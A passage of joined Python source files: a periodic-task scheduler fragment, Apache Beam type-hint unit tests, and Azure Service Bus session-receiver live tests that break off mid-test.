'_periodic_task', False): task = value name = task.__name__ if task._periodic_spacing < 0: LOG.info(_LI('Skipping periodic task %(task)s because ' 'its interval is negative'), {'task': name}) continue if not task._periodic_enabled: LOG.info(_LI('Skipping periodic task %(task)s because ' 'it is disabled'), {'task': name}) continue # A periodic spacing of zero indicates that this task should # be run on the default interval to avoid running too # frequently. if task._periodic_spacing == 0: task._periodic_spacing = DEFAULT_INTERVAL cls._periodic_tasks.append((name, task)) cls._periodic_spacing[name] = task._periodic_spacing def _nearest_boundary(last_run, spacing): """Find nearest boundary which is in the past, which is a multiple of the spacing with the last run as an offset. Eg if last run was 10 and spacing was 7, the new last run could be: 17, 24, 31, 38... 0% to 5% of the spacing value will be added to this value to ensure tasks do not synchronize. This jitter is rounded to the nearest second, this means that spacings smaller than 20 seconds will not have jitter. """ current_time = time.time() if last_run is None: return current_time delta = current_time - last_run offset = delta % spacing # Add up to 5% jitter jitter = int(spacing * (random.random() / 20)) return current_time - offset + jitter @six.add_metaclass(_PeriodicTasksMeta) class PeriodicTasks(object): def __init__(self): super(PeriodicTasks, self).__init__() self._periodic_last_run = {} for name, task in self._periodic_tasks: self._periodic_last_run[name] = task._periodic_last_run def run_periodic_tasks(self, context, raise_on_error=False): """Tasks to be run at a periodic interval.""" idle_for = DEFAULT_INTERVAL for task_name, task in self._periodic_tasks: full_task_name = '.'.join([self.__class__.__name__, task_name]) spacing = self._periodic_spacing[task_name] last_run = self._periodic_last_run[task_name] # Check if due, if not skip idle_for = min(idle_for, spacing) if last_run is not None: delta = last_run + spacing - time.time() if delta > 0: idle_for = min(idle_for, delta) continue LOG.debug("Running periodic task %(full_task_name)s", {"full_task_name": full_task_name}) self._periodic_last_run[task_name] = _nearest_boundary( last_run, spacing) try: task(self, context) except Exception as e: if raise_on_error: raise LOG.exception(_LE("Error during %(full_task_name)s: %(e)s"), {"full_task_name": full_task_name, "e": e}) time.sleep(0) return idle_for
# # Licensed to the Apache Software Foundation (ASF) under one or more # contributor license agreements. See the NOTICE file distributed with # this work for additional information regarding copyright ownership. # The ASF licenses this file to You under the Apache License, Version 2.0 # (the "License"); you may not use this file except in compliance with # the License. You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # """Unit tests for the type-hint objects and decorators.""" import inspect import unittest import apache_beam as beam from apache_beam import pvalue from apache_beam import typehints from apache_beam.test_pipeline import TestPipeline from apache_beam.transforms.util import assert_that, equal_to from apache_beam.typehints import WithTypeHints from apache_beam.utils.pipeline_options import OptionsContext # These test often construct a pipeline as value | PTransform to test side # effects (e.g. errors). # pylint: disable=expression-not-assigned class MainInputTest(unittest.TestCase): def test_bad_main_input(self): @typehints.with_input_types(str, int) def repeat(s, times): return s * times with self.assertRaises(typehints.TypeCheckError): [1, 2, 3] | beam.Map(repeat, 3) def test_non_function(self): result = ['a', 'bb', 'c'] | beam.Map(str.upper) self.assertEqual(['A', 'BB', 'C'], sorted(result)) result = ['xa', 'bbx', 'xcx'] | beam.Map(str.strip, 'x') self.assertEqual(['a', 'bb', 'c'], sorted(result)) result = ['1', '10', '100'] | beam.Map(int) self.assertEqual([1, 10, 100], sorted(result)) result = ['1', '10', '100'] | beam.Map(int, 16) self.assertEqual([1, 16, 256], sorted(result)) with self.assertRaises(typehints.TypeCheckError): [1, 2, 3] | beam.Map(str.upper) def test_loose_bounds(self): @typehints.with_input_types(typehints.Union[int, float, long]) @typehints.with_output_types(basestring) def format_number(x): return '%g' % x result = [1, 2, 3] | beam.Map(format_number) self.assertEqual(['1', '2', '3'], sorted(result)) def test_typed_dofn_class(self): @typehints.with_input_types(int) @typehints.with_output_types(str) class MyDoFn(beam.DoFn): def process(self, element): return [str(element)] result = [1, 2, 3] | beam.ParDo(MyDoFn()) self.assertEqual(['1', '2', '3'], sorted(result)) with self.assertRaises(typehints.TypeCheckError): ['a', 'b', 'c'] | beam.ParDo(MyDoFn()) with self.assertRaises(typehints.TypeCheckError): [1, 2, 3] | (beam.ParDo(MyDoFn()) | 'again' >> beam.ParDo(MyDoFn())) def test_typed_dofn_instance(self): class MyDoFn(beam.DoFn): def process(self, element): return [str(element)] my_do_fn = MyDoFn().with_input_types(int).with_output_types(str) result = [1, 2, 3] | beam.ParDo(my_do_fn) self.assertEqual(['1', '2', '3'], sorted(result)) with self.assertRaises(typehints.TypeCheckError): ['a', 'b', 'c'] | beam.ParDo(my_do_fn) with self.assertRaises(typehints.TypeCheckError): [1, 2, 3] | (beam.ParDo(my_do_fn) | 'again' >> beam.ParDo(my_do_fn)) class SideInputTest(unittest.TestCase): def _run_repeat_test(self, repeat): self._run_repeat_test_good(repeat) self._run_repeat_test_bad(repeat) @OptionsContext(pipeline_type_check=True) def _run_repeat_test_good(self, repeat): # As a positional argument. result = ['a', 'bb', 'c'] | beam.Map(repeat, 3) self.assertEqual(['aaa', 'bbbbbb', 'ccc'], sorted(result)) # As a keyword argument. result = ['a', 'bb', 'c'] | beam.Map(repeat, times=3) self.assertEqual(['aaa', 'bbbbbb', 'ccc'], sorted(result)) def _run_repeat_test_bad(self, repeat): # Various mismatches. with self.assertRaises(typehints.TypeCheckError): ['a', 'bb', 'c'] | beam.Map(repeat, 'z') with self.assertRaises(typehints.TypeCheckError): ['a', 'bb', 'c'] | beam.Map(repeat, times='z') with self.assertRaises(typehints.TypeCheckError): ['a', 'bb', 'c'] | beam.Map(repeat, 3, 4) if not inspect.getargspec(repeat).defaults: with self.assertRaises(typehints.TypeCheckError): ['a', 'bb', 'c'] | beam.Map(repeat) def test_basic_side_input_hint(self): @typehints.with_input_types(str, int) def repeat(s, times): return s * times self._run_repeat_test(repeat) def test_keyword_side_input_hint(self): @typehints.with_input_types(str, times=int) def repeat(s, times): return s * times self._run_repeat_test(repeat) def test_default_typed_hint(self): @typehints.with_input_types(str, int) def repeat(s, times=3): return s * times self._run_repeat_test(repeat) def test_default_untyped_hint(self): @typehints.with_input_types(str) def repeat(s, times=3): return s * times # No type checking on dfault arg. self._run_repeat_test_good(repeat) @OptionsContext(pipeline_type_check=True) def test_varargs_side_input_hint(self): @typehints.with_input_types(str, int) def repeat(s, *times): return s * times[0] result = ['a', 'bb', 'c'] | beam.Map(repeat, 3) self.assertEqual(['aaa', 'bbbbbb', 'ccc'], sorted(result)) # TODO(robertwb): Support partially defined varargs. # with self.assertRaises(typehints.TypeCheckError): # ['a', 'bb', 'c'] | beam.Map(repeat, 'z') def test_deferred_side_inputs(self): @typehints.with_input_types(str, int) def repeat(s, times): return s * times p = TestPipeline() main_input = p | beam.Create(['a', 'bb', 'c']) side_input = p | 'side' >> beam.Create([3]) result = main_input | beam.Map(repeat, pvalue.AsSingleton(side_input)) assert_that(result, equal_to(['aaa', 'bbbbbb', 'ccc'])) p.run() bad_side_input = p | 'bad_side' >> beam.Create(['z']) with self.assertRaises(typehints.TypeCheckError): main_input | 'bis' >> beam.Map(repeat, pvalue.AsSingleton(bad_side_input)) def test_deferred_side_input_iterable(self): @typehints.with_input_types(str, typehints.Iterable[str]) def concat(glue, items): return glue.join(sorted(items)) p = TestPipeline() main_input = p | beam.Create(['a', 'bb', 'c']) side_input = p | 'side' >> beam.Create(['x', 'y', 'z']) result = main_input | beam.Map(concat, pvalue.AsIter(side_input)) assert_that(result, equal_to(['xayaz', 'xbbybbz', 'xcycz'])) p.run() bad_side_input = p | 'bad_side' >> beam.Create([1, 2, 3]) with self.assertRaises(typehints.TypeCheckError): main_input | 'fail' >> beam.Map(concat, pvalue.AsIter(bad_side_input)) class CustomTransformTest(unittest.TestCase): class CustomTransform(beam.PTransform): def _extract_input_pvalues(self, pvalueish): return pvalueish, (pvalueish['in0'], pvalueish['in1']) def expand(self, pvalueish): return {'out0': pvalueish['in0'], 'out1': pvalueish['in1']} # TODO(robertwb): (typecheck) Make these the default? def with_input_types(self, *args, **kwargs): return WithTypeHints.with_input_types(self, *args, **kwargs) def with_output_types(self, *args, **kwargs): return WithTypeHints.with_output_types(self, *args, **kwargs) test_input = {'in0': ['a', 'b', 'c'], 'in1': [1, 2, 3]} def check_output(self, result): self.assertEqual(['a', 'b', 'c'], sorted(result['out0'])) self.assertEqual([1, 2, 3], sorted(result['out1'])) def test_custom_transform(self): self.check_output(self.test_input | self.CustomTransform()) def test_keyword_type_hints(self): self.check_output( self.test_input | self.CustomTransform().with_input_types( in0=str, in1=int)) self.check_output( self.test_input | self.CustomTransform().with_input_types(in0=str)) self.check_output( self.test_input | self.CustomTransform().with_output_types( out0=str, out1=int)) with self.assertRaises(typehints.TypeCheckError): self.test_input | self.CustomTransform().with_input_types(in0=int) with self.assertRaises(typehints.TypeCheckError): self.test_input | self.CustomTransform().with_output_types(out0=int) def test_flat_type_hint(self): # Type hint is applied to both. ({'in0': ['a', 'b', 'c'], 'in1': ['x', 'y', 'z']} | self.CustomTransform().with_input_types(str)) with self.assertRaises(typehints.TypeCheckError): self.test_input | self.CustomTransform().with_input_types(str) with self.assertRaises(typehints.TypeCheckError): self.test_input | self.CustomTransform().with_input_types(int) with self.assertRaises(typehints.TypeCheckError): self.test_input | self.CustomTransform().with_output_types(int) if __name__ == '__main__': unittest.main()
#------------------------------------------------------------------------- # Copyright (c) Microsoft Corporation. All rights reserved. # Licensed under the MIT License. See License.txt in the project root for # license information. #-------------------------------------------------------------------------- import logging import concurrent import sys import os import pytest import time import uuid from datetime import timedelta from azure.servicebus import ( ServiceBusClient, AutoLockRenewer, ServiceBusMessage, ServiceBusReceivedMessage, ServiceBusReceiveMode, NEXT_AVAILABLE_SESSION, ServiceBusSubQueue ) from azure.servicebus._common.utils import utc_now from azure.servicebus.exceptions import ( ServiceBusConnectionError, ServiceBusAuthenticationError, ServiceBusError, SessionLockLostError, MessageAlreadySettled, OperationTimeoutError, AutoLockRenewTimeout ) from devtools_testutils import AzureMgmtTestCase, CachedResourceGroupPreparer from servicebus_preparer import ( CachedServiceBusNamespacePreparer, CachedServiceBusQueuePreparer, ServiceBusTopicPreparer, ServiceBusQueuePreparer, ServiceBusSubscriptionPreparer ) from utilities import get_logger, print_message, sleep_until_expired _logger = get_logger(logging.DEBUG) class ServiceBusSessionTests(AzureMgmtTestCase): @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer() @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_session_client_conn_str_receive_handler_peeklock(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) sender = sb_client.get_queue_sender(servicebus_queue.name) receiver = sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5) with sender, receiver: for i in range(3): message = ServiceBusMessage("Handler message no. {}".format(i)) message.partition_key = 'pkey' message.session_id = session_id message.partition_key = session_id message.application_properties = {'key': 'value'} message.subject = 'label' message.content_type = 'application/text' message.correlation_id = 'cid' message.message_id = str(i) message.to = 'to' message.reply_to = 'reply_to' message.reply_to_session_id = 'reply_to_session_id' with pytest.raises(ValueError): message.partition_key = 'pkey' sender.send_messages(message) with pytest.raises(ServiceBusError): receiver = sb_client.get_queue_receiver(servicebus_queue.name, max_wait_time=5)._open_with_retry() count = 0 received_cnt_dic = {} for message in receiver: print_message(_logger, message) assert message.delivery_count == 0 assert message.application_properties assert message.application_properties[b'key'] == b'value' assert message.subject == 'label' assert message.content_type == 'application/text' assert message.correlation_id == 'cid' assert message.partition_key == session_id assert message.to == 'to' assert message.reply_to == 'reply_to' assert message.sequence_number assert message.enqueued_time_utc assert message.session_id == session_id assert message.reply_to_session_id == 'reply_to_session_id' count += 1 receiver.complete_message(message) if message.message_id not in received_cnt_dic: received_cnt_dic[message.message_id] = 1 sender.send_messages(message) else: received_cnt_dic[message.message_id] += 1 assert received_cnt_dic['0'] == 2 and received_cnt_dic['1'] == 2 and received_cnt_dic['2'] == 2 assert count == 6 session_id = "" sender = sb_client.get_queue_sender(servicebus_queue.name) receiver = sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5) with sender, receiver: for i in range(3): message = ServiceBusMessage("Handler message no. {}".format(i)) message.partition_key = 'pkey' message.session_id = session_id message.partition_key = session_id message.application_properties = {'key': 'value'} message.subject = 'label' message.content_type = 'application/text' message.correlation_id = 'cid' message.message_id = str(i) message.to = 'to' message.reply_to = 'reply_to' message.reply_to_session_id = 'reply_to_session_id' with pytest.raises(ValueError): message.partition_key = 'pkey' sender.send_messages(message) with pytest.raises(ServiceBusError): receiver = sb_client.get_queue_receiver(servicebus_queue.name, max_wait_time=5)._open_with_retry() count = 0 received_cnt_dic = {} for message in receiver: print_message(_logger, message) assert message.delivery_count == 0 assert message.application_properties assert message.application_properties[b'key'] == b'value' assert message.subject == 'label' assert message.content_type == 'application/text' assert message.correlation_id == 'cid' assert message.partition_key == session_id assert message.to == 'to' assert message.reply_to == 'reply_to' assert message.sequence_number assert message.enqueued_time_utc assert message.session_id == session_id assert message.reply_to_session_id == 'reply_to_session_id' count += 1 receiver.complete_message(message) if message.message_id not in received_cnt_dic: received_cnt_dic[message.message_id] = 1 sender.send_messages(message) else: received_cnt_dic[message.message_id] += 1 assert received_cnt_dic['0'] == 2 and received_cnt_dic['1'] == 2 and received_cnt_dic['2'] == 2 assert count == 6 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True, lock_duration='PT5S') def test_session_by_queue_client_conn_str_receive_handler_receiveanddelete(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(10): message = ServiceBusMessage("Handler message no. {}".format(i), session_id=session_id) sender.send_messages(message) messages = [] with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, receive_mode=ServiceBusReceiveMode.RECEIVE_AND_DELETE, max_wait_time=5) as receiver: for message in receiver: messages.append(message) assert session_id == receiver._session_id assert session_id == message.session_id with pytest.raises(ValueError): receiver.complete_message(message) assert not receiver._running assert len(messages) == 10 time.sleep(5) messages = [] with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, receive_mode=ServiceBusReceiveMode.RECEIVE_AND_DELETE, max_wait_time=5) as session: for message in session: messages.append(message) assert len(messages) == 0 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer() @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_session_client_conn_str_receive_handler_with_stop(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(10): message = ServiceBusMessage("Stop message no. {}".format(i), session_id=session_id) sender.send_messages(message) messages = [] with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5) as receiver: for message in receiver: assert session_id == receiver.session.session_id assert session_id == message.session_id messages.append(message) receiver.complete_message(message) if len(messages) >= 5: break assert receiver._running assert len(messages) == 5 for message in receiver: assert session_id == receiver.session.session_id assert session_id == message.session_id messages.append(message) receiver.complete_message(message) if len(messages) >= 5: break assert not receiver._running assert len(messages) == 6 @pytest.mark.liveTest @pytest.mark.live_test_only @pytest.mark.xfail(reason="'Cannot open log' error, potential service bug", raises=ServiceBusError) @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_session_client_conn_str_receive_handler_with_no_session(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False, retry_total=1) as sb_client: with pytest.raises(OperationTimeoutError): with sb_client.get_queue_receiver(servicebus_queue.name, session_id=NEXT_AVAILABLE_SESSION, max_wait_time=10,) as session: pass @pytest.mark.liveTest @pytest.mark.live_test_only @pytest.mark.xfail(reason="'Cannot open log' error, potential service bug", raises=ServiceBusError) @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_connection_failure_is_idempotent(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): #Technically this validates for all senders/receivers, not just session, but since it uses session to generate a recoverable failure, putting it in here. with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: # First let's just try the naive failure cases. receiver = sb_client.get_queue_receiver("THIS_IS_WRONG_ON_PURPOSE") with pytest.raises(ServiceBusAuthenticationError): receiver._open_with_retry() assert not receiver._running assert not receiver._handler sender = sb_client.get_queue_sender("THIS_IS_WRONG_ON_PURPOSE") with pytest.raises(ServiceBusAuthenticationError): sender._open_with_retry() assert not receiver._running assert not receiver._handler # Then let's try a case we can recover from to make sure everything works on reestablishment. receiver = sb_client.get_queue_receiver(servicebus_queue.name, session_id=NEXT_AVAILABLE_SESSION) with pytest.raises(OperationTimeoutError): receiver._open_with_retry() session_id = str(uuid.uuid4()) with sb_client.get_queue_sender(servicebus_queue.name) as sender: sender.send_messages(ServiceBusMessage("test session sender", session_id=session_id)) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=NEXT_AVAILABLE_SESSION, max_wait_time=5) as receiver: messages = [] for message in receiver: messages.append(message) assert len(messages) == 1 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_session_client_conn_str_receive_handler_with_inactive_session(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) messages = [] with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, receive_mode=ServiceBusReceiveMode.RECEIVE_AND_DELETE, max_wait_time=5) as session: for message in session: messages.append(message) assert session._running assert len(messages) == 0 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_complete(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: with sb_client.get_queue_sender(servicebus_queue.name) as sender: deferred_messages = [] session_id = str(uuid.uuid4()) for i in range(10): message = ServiceBusMessage("Deferred message no. {}".format(i), session_id=session_id) sender.send_messages(message) count = 0 with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5) as receiver: for message in receiver: deferred_messages.append(message.sequence_number) print_message(_logger, message) count += 1 receiver.defer_message(message) assert count == 10 with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5) as receiver: deferred = receiver.receive_deferred_messages(deferred_messages) assert len(deferred) == 10 for message in deferred: assert isinstance(message, ServiceBusReceivedMessage) assert message.lock_token assert not message.locked_until_utc assert message._receiver with pytest.raises(TypeError): receiver.renew_message_lock(message) receiver.complete_message(message) @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_deadletter(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: with sb_client.get_queue_sender(servicebus_queue.name) as sender: deferred_messages = [] session_id = str(uuid.uuid4()) messages = [ServiceBusMessage("Deferred message no. {}".format(i), session_id=session_id) for i in range(10)] sender.send_messages(messages) count = 0 with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5) as receiver: for message in receiver: deferred_messages.append(message.sequence_number) print_message(_logger, message) count += 1 receiver.defer_message(message) assert count == 10 with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5) as receiver: deferred = receiver.receive_deferred_messages(deferred_messages) assert len(deferred) == 10 for message in deferred: assert isinstance(message, ServiceBusReceivedMessage) receiver.dead_letter_message(message, reason="Testing reason", error_description="Testing description") count = 0 with sb_client.get_queue_receiver(servicebus_queue.name, sub_queue=ServiceBusSubQueue.DEAD_LETTER, max_wait_time=5) as receiver: for message in receiver: count += 1 print_message(_logger, message) assert message.dead_letter_reason == 'Testing reason' assert message.dead_letter_error_description == 'Testing description' assert message.application_properties[b'DeadLetterReason'] == b'Testing reason' assert message.application_properties[b'DeadLetterErrorDescription'] == b'Testing description' receiver.complete_message(message) assert count == 10 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_servicebus_client_iter_messages_with_retrieve_deferred_receiver_deletemode(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: with sb_client.get_queue_sender(servicebus_queue.name) as sender: deferred_messages = [] session_id = str(uuid.uuid4()) messages = [ServiceBusMessage("Deferred message no. {}".format(i), session_id=session_id) for i in range(10)] for message in messages: sender.send_messages(message) count = 0 with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5) as receiver: for message in receiver: deferred_messages.append(message.sequence_number) print_message(_logger, message) count += 1 receiver.defer_message(message) assert count == 10 with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5, receive_mode=ServiceBusReceiveMode.RECEIVE_AND_DELETE) as receiver: deferred = receiver.receive_deferred_messages(deferred_messages) assert len(deferred) == 10 for message in deferred: assert isinstance(message, ServiceBusReceivedMessage) with pytest.raises(ValueError): receiver.complete_message(message) with pytest.raises(ServiceBusError): deferred = receiver.receive_deferred_messages(deferred_messages) @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_servicebus_client_iter_messages_with_retrieve_deferred_client(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: deferred_messages = [] session_id = str(uuid.uuid4()) with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(10): message = ServiceBusMessage("Deferred message no. {}".format(i), session_id=session_id) sender.send_messages(message) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5) as receiver: count = 0 for message in receiver: deferred_messages.append(message.sequence_number) print_message(_logger, message) count += 1 receiver.defer_message(message) assert count == 10 deferred = receiver.receive_deferred_messages(deferred_messages) with pytest.raises(MessageAlreadySettled): receiver.complete_message(message) @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_servicebus_client_receive_with_retrieve_deadletter(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, max_wait_time=5, prefetch_count=10) as receiver: with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(10): message = ServiceBusMessage("Dead lettered message no. {}".format(i), session_id=session_id) sender.send_messages(message) count = 0 messages = receiver.receive_messages() while messages: for message in messages: print_message(_logger, message) receiver.dead_letter_message(message, reason="Testing reason", error_description="Testing description") count += 1 messages = receiver.receive_messages() assert count == 10 with sb_client.get_queue_receiver(servicebus_queue.name, sub_queue = ServiceBusSubQueue.DEAD_LETTER, max_wait_time=5) as receiver: count = 0 for message in receiver: print_message(_logger, message) receiver.complete_message(message) assert message.dead_letter_reason == 'Testing reason' assert message.dead_letter_error_description == 'Testing description' assert message.application_properties[b'DeadLetterReason'] == b'Testing reason' assert message.application_properties[b'DeadLetterErrorDescription'] == b'Testing description' count += 1 assert count == 10 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_servicebus_client_browse_messages_client(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(5): message = ServiceBusMessage("Test message no. {}".format(i), session_id=session_id) sender.send_messages(message) session_id_2 = str(uuid.uuid4()) with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(3): message = ServiceBusMessage("Test message no. {}".format(i), session_id=session_id_2) sender.send_messages(message) with pytest.raises(ServiceBusError): with sb_client.get_queue_receiver(servicebus_queue.name): messages = sb_client.peek_messages(5) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id) as receiver: messages = receiver.peek_messages(5) assert len(messages) == 5 assert all(isinstance(m, ServiceBusReceivedMessage) for m in messages) for message in messages: print_message(_logger, message) with pytest.raises(ValueError): receiver.complete_message(message) with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id_2) as receiver: messages = receiver.peek_messages(5) assert len(messages) == 3 @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_servicebus_client_browse_messages_with_receiver(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) with sb_client.get_queue_receiver(servicebus_queue.name, max_wait_time=5, session_id=session_id) as receiver: with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(5): message = ServiceBusMessage("Test message no. {}".format(i), session_id=session_id) sender.send_messages(message) messages = receiver.peek_messages(5) assert len(messages) > 0 assert all(isinstance(m, ServiceBusReceivedMessage) for m in messages) for message in messages: print_message(_logger, message) with pytest.raises(ValueError): receiver.complete_message(message) @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True) def test_session_by_servicebus_client_renew_client_locks(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: session_id = str(uuid.uuid4()) messages = [] locks = 3 with sb_client.get_queue_receiver(servicebus_queue.name, session_id=session_id, prefetch_count=10) as receiver: with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(locks): message = ServiceBusMessage("Test message no. {}".format(i), session_id=session_id) sender.send_messages(message) messages.extend(receiver.receive_messages()) recv = True while recv: recv = receiver.receive_messages(max_wait_time=5) messages.extend(recv) try: for m in messages: with pytest.raises(TypeError): expired = m._lock_expired assert m.locked_until_utc is None assert m.lock_token is not None time.sleep(5) initial_expiry = receiver.session._locked_until_utc receiver.session.renew_lock(timeout=5) assert (receiver.session._locked_until_utc - initial_expiry) >= timedelta(seconds=5) finally: receiver.complete_message(messages[0]) receiver.complete_message(messages[1]) # This magic number is because of a 30 second lock renewal window. Chose 31 seconds because at 30, you'll see "off by .05 seconds" flaky failures # potentially as a side effect of network delays/sleeps/"typical distributed systems nonsense." In a perfect world we wouldn't have a magic number/network hop but this allows # a slightly more robust test in absence of that. assert (receiver.session._locked_until_utc - utc_now()) <= timedelta(seconds=60) sleep_until_expired(receiver.session) with pytest.raises(SessionLockLostError): receiver.complete_message(messages[2]) @pytest.mark.liveTest @pytest.mark.live_test_only @CachedResourceGroupPreparer(name_prefix='servicebustest') @CachedServiceBusNamespacePreparer(name_prefix='servicebustest') @ServiceBusQueuePreparer(name_prefix='servicebustest', requires_session=True, lock_duration='PT5S') def test_session_by_conn_str_receive_handler_with_autolockrenew(self, servicebus_namespace_connection_string, servicebus_queue, **kwargs): session_id = str(uuid.uuid4()) with ServiceBusClient.from_connection_string( servicebus_namespace_connection_string, logging_enable=False) as sb_client: with sb_client.get_queue_sender(servicebus_queue.name) as sender: for i in range(10): message = ServiceBusMessage("{}".format(i), session_id=session_id) sender.send_messages(message) results = [] def lock_lost_callback(renewable, error): results.append(renewable) renewer = AutoLockRenewer() messages = [] with sb_client.get_queue_receiver(servicebus_queue.name, 